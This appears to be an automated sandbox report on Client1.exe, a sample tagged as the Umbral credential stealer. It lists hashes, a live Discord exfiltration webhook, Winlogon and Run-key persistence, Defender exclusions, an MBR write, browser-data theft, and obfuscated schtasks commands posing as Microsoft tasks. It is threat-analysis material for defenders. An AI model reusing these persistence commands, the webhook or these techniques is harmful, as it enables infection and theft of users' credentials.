Analysis
- max time kernel: 644s
- max time network: 646s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27-05-2024 12:34
- Static task: static1
Errors
General
- Target: Client1.exe
- Size: 747KB
- MD5: c8d8bf0cef0eb986664a7653b30062b6
- SHA1: da1957c3bcd76a71d8182fd42a677e5aeaf76cde
- SHA256: e3b98f944dd0cf41f0955cbc2b8858d249a39f69568ea82286d14e20d8e9c910
- SHA512: 34278aee895a03cd76b56278c5b362aa013d83f8be355fd5fdac442e19eaf5a60477f317cdeac157ba69785661866ff41d6051c1cb40ecb473c2814c5d0c672a
- SSDEEP: 12288:+cWW/gSKBvPVle8c6bn3VG0jMRxPjT90n/4mhBE:+CNEVXePjT90ww
Malware Config
- Extracted: umbral
- https://discord.com/api/webhooks/1243097311723393148/0kJSMmx_-19_4524KFq8Hz7UKUelS_Uh7rQ6mExsss1TqjKf8JjJJVNCnPnFTM52o-iH
Signatures
- Detect Umbral payload (2 IoCs)
  resource | yara_rule
  behavioral1/files/0x0005000000000733-1249.dat | family_umbral
  behavioral1/memory/3464-1253-0x000001AA875E0000-0x000001AA87628000-memory.dmp | family_umbral
- Modifies WinLogon for persistence (2 TTPs, 2 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Documents\\Microsoft Project.exe" | Client1.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ov5u5ysv.lnq.exe" | ov5u5ysv.lnq.exe
- Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process: 2816 powershell.exe, 3880 powershell.exe, 4416 powershell.exe, 1316 powershell.exe, 4736 powershell.exe, 2664 powershell.exe, 3944 powershell.exe
- Disables Task Manager via registry modification
- Disables cmd.exe use via registry modification (1 IoCs)
  description | ioc | Process
  Set value (int) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" | Client1.exe
- Drops file in Drivers directory (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | cusvtnlp.1l2.exe
- Modifies AppInit DLL entries (2 TTPs)
- Checks computer location settings (2 TTPs, 4 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | br3bbgzw.z3f.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | Sage CRM.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | Sage CRM.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | Client1.exe
- Executes dropped EXE (8 IoCs)
  pid | Process: 3452 br3bbgzw.z3f.exe, 3464 cusvtnlp.1l2.exe, 4944 Sage CRM.exe, 1616 ejqcuqc5.3cz.exe, 2728 Microsoft Project.exe, 2664 ov5u5ysv.lnq.exe, 3700 Sage CRM.exe, 2720 Microsoft Project.exe
- Loads dropped DLL (64 IoCs)
pid Process 4208 Process not Found 644 Process not Found 4808 Process not Found 1660 Process not Found 4028 WmiApSrv.exe 3428 Process not Found 2388 Process not Found 2884 Process not Found 2816 Process not Found 4232 Process not Found 2644 Process not Found 1192 Process not Found 4884 Process not Found 440 Process not Found 1316 Process not Found 2108 Process not Found 4308 Process not Found 5032 Process not Found 3128 Process not Found 3656 Process not Found 4968 Process not Found 2816 Process not Found 1244 Process not Found 3068 Process not Found 1192 Process not Found 1488 Process not Found 4516 Process not Found 3664 Process not Found 4828 Process not Found 1044 Process not Found 4236 Process not Found 4308 Process not Found 1692 Process not Found 2664 powershell.exe 1204 AUDIODG.EXE 2016 Process not Found 4828 Process not Found 4772 Process not Found 1684 Process not Found 4072 Process not Found 988 Process not Found 752 Process not Found 2312 Process not Found 5056 Process not Found 736 Process not Found 3944 powershell.exe 3464 cusvtnlp.1l2.exe 1228 Process not Found 3356 Process not Found 4584 wmic.exe 2948 Process not Found 2148 Process not Found 4208 Process not Found 2816 powershell.exe 2436 Process not Found 3160 powershell.exe 1836 Process not Found 4972 powershell.exe 1688 Process not Found 2748 powershell.exe 4068 Process not Found 8 wmic.exe 4640 Process not Found 3900 wmic.exe -
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update_Pro = "C:\\Users\\Public\\Documents\\Sage CRM.exe" | Client1.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ov5u5ysv.lnq.exe" | ov5u5ysv.lnq.exe
- Enumerates connected drives (3 TTPs, 23 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: WScript.exe File opened (read-only) \??\O: WScript.exe File opened (read-only) \??\V: WScript.exe File opened (read-only) \??\X: WScript.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\G: WScript.exe File opened (read-only) \??\I: WScript.exe File opened (read-only) \??\P: WScript.exe File opened (read-only) \??\T: WScript.exe File opened (read-only) \??\W: WScript.exe File opened (read-only) \??\K: WScript.exe File opened (read-only) \??\L: WScript.exe File opened (read-only) \??\M: WScript.exe File opened (read-only) \??\Q: WScript.exe File opened (read-only) \??\S: WScript.exe File opened (read-only) \??\Y: WScript.exe File opened (read-only) \??\N: WScript.exe File opened (read-only) \??\R: WScript.exe File opened (read-only) \??\U: WScript.exe File opened (read-only) \??\Z: WScript.exe File opened (read-only) \??\A: WScript.exe File opened (read-only) \??\B: WScript.exe File opened (read-only) \??\H: WScript.exe -
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  58 | discord.com
  59 | discord.com
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  54 | ip-api.com
- Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  description | ioc | Process
  File opened for modification | \??\PhysicalDrive0 | ov5u5ysv.lnq.exe
- Drops file in Windows directory (1 IoCs)
  description | ioc | Process
  File created | C:\Windows\xdwd.dll | Client1.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTPs, 64 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3112 schtasks.exe 4924 schtasks.exe 2956 schtasks.exe 4236 schtasks.exe 4032 schtasks.exe 4408 schtasks.exe 1124 schtasks.exe 1416 schtasks.exe 3040 schtasks.exe 212 schtasks.exe 1528 schtasks.exe 1664 schtasks.exe 4696 schtasks.exe 4600 schtasks.exe 1712 schtasks.exe 412 schtasks.exe 2284 schtasks.exe 1968 schtasks.exe 3496 schtasks.exe 848 schtasks.exe 2088 schtasks.exe 672 schtasks.exe 1484 schtasks.exe 1116 schtasks.exe 4816 schtasks.exe 3948 schtasks.exe 4924 schtasks.exe 4284 schtasks.exe 2476 schtasks.exe 2636 schtasks.exe 1868 schtasks.exe 780 schtasks.exe 3960 schtasks.exe 3844 schtasks.exe 4468 schtasks.exe 1812 schtasks.exe 836 schtasks.exe 4780 schtasks.exe 1352 schtasks.exe 1544 schtasks.exe 764 schtasks.exe 4724 schtasks.exe 3700 schtasks.exe 4304 schtasks.exe 2796 schtasks.exe 1848 schtasks.exe 4784 schtasks.exe 1408 schtasks.exe 2160 schtasks.exe 768 schtasks.exe 1876 schtasks.exe 4800 schtasks.exe 3160 schtasks.exe 4068 schtasks.exe 2056 schtasks.exe 816 schtasks.exe 2580 schtasks.exe 3700 schtasks.exe 1360 schtasks.exe 2424 schtasks.exe 3320 schtasks.exe 3880 schtasks.exe 2244 schtasks.exe 4832 schtasks.exe -
- Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine videocard installed.
  pid | Process: 3176 wmic.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
- Modifies data under HKEY_USERS (17 IoCs)
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133612870557685872" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "154" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe -
- Modifies registry class (6 IoCs)
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{A65D2BB0-6526-4A8F-97C2-6D4ED1D4B796} WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Sage CRM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Sage CRM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings br3bbgzw.z3f.exe -
- Runs ping.exe (1 TTPs, 1 IoCs)
  pid | Process: 1408 PING.EXE
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid Process 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe -
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (3 IoCs)
  pid | Process: 4496 chrome.exe, 4496 chrome.exe, 4496 chrome.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
description pid Process Token: SeDebugPrivilege 1324 Client1.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeShutdownPrivilege 624 WScript.exe Token: SeCreatePagefilePrivilege 624 WScript.exe Token: 33 1204 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1204 AUDIODG.EXE Token: SeShutdownPrivilege 624 WScript.exe Token: SeCreatePagefilePrivilege 624 WScript.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 3464 cusvtnlp.1l2.exe Token: SeIncreaseQuotaPrivilege 4584 wmic.exe Token: SeSecurityPrivilege 4584 wmic.exe Token: SeTakeOwnershipPrivilege 4584 wmic.exe Token: SeLoadDriverPrivilege 4584 wmic.exe Token: SeSystemProfilePrivilege 4584 wmic.exe Token: SeSystemtimePrivilege 4584 wmic.exe Token: SeProfSingleProcessPrivilege 4584 wmic.exe Token: SeIncBasePriorityPrivilege 4584 wmic.exe Token: SeCreatePagefilePrivilege 4584 wmic.exe Token: SeBackupPrivilege 4584 wmic.exe Token: SeRestorePrivilege 4584 wmic.exe Token: SeShutdownPrivilege 4584 wmic.exe Token: SeDebugPrivilege 4584 wmic.exe Token: SeSystemEnvironmentPrivilege 4584 wmic.exe Token: SeRemoteShutdownPrivilege 4584 wmic.exe Token: SeUndockPrivilege 4584 wmic.exe Token: SeManageVolumePrivilege 4584 wmic.exe Token: 33 4584 wmic.exe Token: 34 4584 wmic.exe Token: 35 4584 wmic.exe Token: 36 4584 wmic.exe Token: SeIncreaseQuotaPrivilege 4584 wmic.exe Token: SeSecurityPrivilege 4584 wmic.exe Token: SeTakeOwnershipPrivilege 4584 wmic.exe Token: SeLoadDriverPrivilege 4584 wmic.exe Token: SeSystemProfilePrivilege 4584 wmic.exe Token: SeSystemtimePrivilege 4584 wmic.exe Token: SeProfSingleProcessPrivilege 4584 wmic.exe Token: SeIncBasePriorityPrivilege 4584 wmic.exe Token: SeCreatePagefilePrivilege 4584 wmic.exe Token: SeBackupPrivilege 4584 wmic.exe Token: SeRestorePrivilege 4584 wmic.exe Token: SeShutdownPrivilege 4584 wmic.exe Token: SeDebugPrivilege 4584 wmic.exe Token: SeSystemEnvironmentPrivilege 4584 wmic.exe Token: SeRemoteShutdownPrivilege 4584 wmic.exe Token: SeUndockPrivilege 
4584 wmic.exe Token: SeManageVolumePrivilege 4584 wmic.exe Token: 33 4584 wmic.exe Token: 34 4584 wmic.exe Token: 35 4584 wmic.exe Token: 36 4584 wmic.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 3160 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeIncreaseQuotaPrivilege 8 wmic.exe Token: SeSecurityPrivilege 8 wmic.exe Token: SeTakeOwnershipPrivilege 8 wmic.exe Token: SeLoadDriverPrivilege 8 wmic.exe Token: SeSystemProfilePrivilege 8 wmic.exe Token: SeSystemtimePrivilege 8 wmic.exe Token: SeProfSingleProcessPrivilege 8 wmic.exe Token: SeIncBasePriorityPrivilege 8 wmic.exe -
- Suspicious use of FindShellTrayWindow (64 IoCs)
pid Process 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 1324 Client1.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe -
- Suspicious use of SendNotifyMessage (24 IoCs)
pid Process 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe -
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | Process: 916 OpenWith.exe, 1592 LogonUI.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
description pid Process procid_target PID 1324 wrote to memory of 3176 1324 Client1.exe 93 PID 1324 wrote to memory of 3176 1324 Client1.exe 93 PID 3176 wrote to memory of 5000 3176 CMD.exe 95 PID 3176 wrote to memory of 5000 3176 CMD.exe 95 PID 1324 wrote to memory of 3144 1324 Client1.exe 96 PID 1324 wrote to memory of 3144 1324 Client1.exe 96 PID 3144 wrote to memory of 4816 3144 CMD.exe 98 PID 3144 wrote to memory of 4816 3144 CMD.exe 98 PID 1324 wrote to memory of 4872 1324 Client1.exe 99 PID 1324 wrote to memory of 4872 1324 Client1.exe 99 PID 4872 wrote to memory of 3112 4872 CMD.exe 101 PID 4872 wrote to memory of 3112 4872 CMD.exe 101 PID 1324 wrote to memory of 3080 1324 Client1.exe 102 PID 1324 wrote to memory of 3080 1324 Client1.exe 102 PID 3080 wrote to memory of 4924 3080 CMD.exe 104 PID 3080 wrote to memory of 4924 3080 CMD.exe 104 PID 1324 wrote to memory of 3464 1324 Client1.exe 106 PID 1324 wrote to memory of 3464 1324 Client1.exe 106 PID 3464 wrote to memory of 4252 3464 CMD.exe 108 PID 3464 wrote to memory of 4252 3464 CMD.exe 108 PID 1324 wrote to memory of 4532 1324 Client1.exe 111 PID 1324 wrote to memory of 4532 1324 Client1.exe 111 PID 4532 wrote to memory of 2056 4532 CMD.exe 113 PID 4532 wrote to memory of 2056 4532 CMD.exe 113 PID 1324 wrote to memory of 1004 1324 Client1.exe 114 PID 1324 wrote to memory of 1004 1324 Client1.exe 114 PID 1004 wrote to memory of 4408 1004 CMD.exe 116 PID 1004 wrote to memory of 4408 1004 CMD.exe 116 PID 1324 wrote to memory of 4816 1324 Client1.exe 118 PID 1324 wrote to memory of 4816 1324 Client1.exe 118 PID 4816 wrote to memory of 3836 4816 CMD.exe 120 PID 4816 wrote to memory of 3836 4816 CMD.exe 120 PID 1324 wrote to memory of 3380 1324 Client1.exe 121 PID 1324 wrote to memory of 3380 1324 Client1.exe 121 PID 3380 wrote to memory of 3948 3380 CMD.exe 123 PID 3380 wrote to memory of 3948 3380 CMD.exe 123 PID 1324 wrote to memory of 4892 1324 Client1.exe 124 PID 1324 wrote to memory of 4892 1324 
Client1.exe 124 PID 1324 wrote to memory of 1360 1324 Client1.exe 127 PID 1324 wrote to memory of 1360 1324 Client1.exe 127 PID 1360 wrote to memory of 4832 1360 CMD.exe 129 PID 1360 wrote to memory of 4832 1360 CMD.exe 129 PID 1324 wrote to memory of 2392 1324 Client1.exe 130 PID 1324 wrote to memory of 2392 1324 Client1.exe 130 PID 2392 wrote to memory of 3700 2392 CMD.exe 132 PID 2392 wrote to memory of 3700 2392 CMD.exe 132 PID 1324 wrote to memory of 2884 1324 Client1.exe 133 PID 1324 wrote to memory of 2884 1324 Client1.exe 133 PID 2884 wrote to memory of 4708 2884 CMD.exe 135 PID 2884 wrote to memory of 4708 2884 CMD.exe 135 PID 1324 wrote to memory of 1896 1324 Client1.exe 136 PID 1324 wrote to memory of 1896 1324 Client1.exe 136 PID 1896 wrote to memory of 2216 1896 CMD.exe 138 PID 1896 wrote to memory of 2216 1896 CMD.exe 138 PID 1324 wrote to memory of 4648 1324 Client1.exe 139 PID 1324 wrote to memory of 4648 1324 Client1.exe 139 PID 4648 wrote to memory of 4924 4648 CMD.exe 141 PID 4648 wrote to memory of 4924 4648 CMD.exe 141 PID 1324 wrote to memory of 4384 1324 Client1.exe 142 PID 1324 wrote to memory of 4384 1324 Client1.exe 142 PID 4384 wrote to memory of 4304 4384 CMD.exe 144 PID 4384 wrote to memory of 4304 4384 CMD.exe 144 PID 1324 wrote to memory of 4548 1324 Client1.exe 145 PID 1324 wrote to memory of 4548 1324 Client1.exe 145 -
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid | Process: 740 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client1.exe"C:\Users\Admin\AppData\Local\Temp\Client1.exe"1⤵
- Modifies WinLogon for persistence
- Disables cmd.exe use via registry modification
- Checks computer location settings
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "LastActivityView" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "LastActivityView" /tr "C:\Users\Admin\Documents\Microsoft Project.exe"3⤵PID:5000
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4816
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive Update" /tr "C:\Users\Public\Documents\Sage CRM.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive Update" /tr "C:\Users\Public\Documents\Sage CRM.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3112
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4924
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4252
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2056
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4408
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3836
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3948
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4892
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
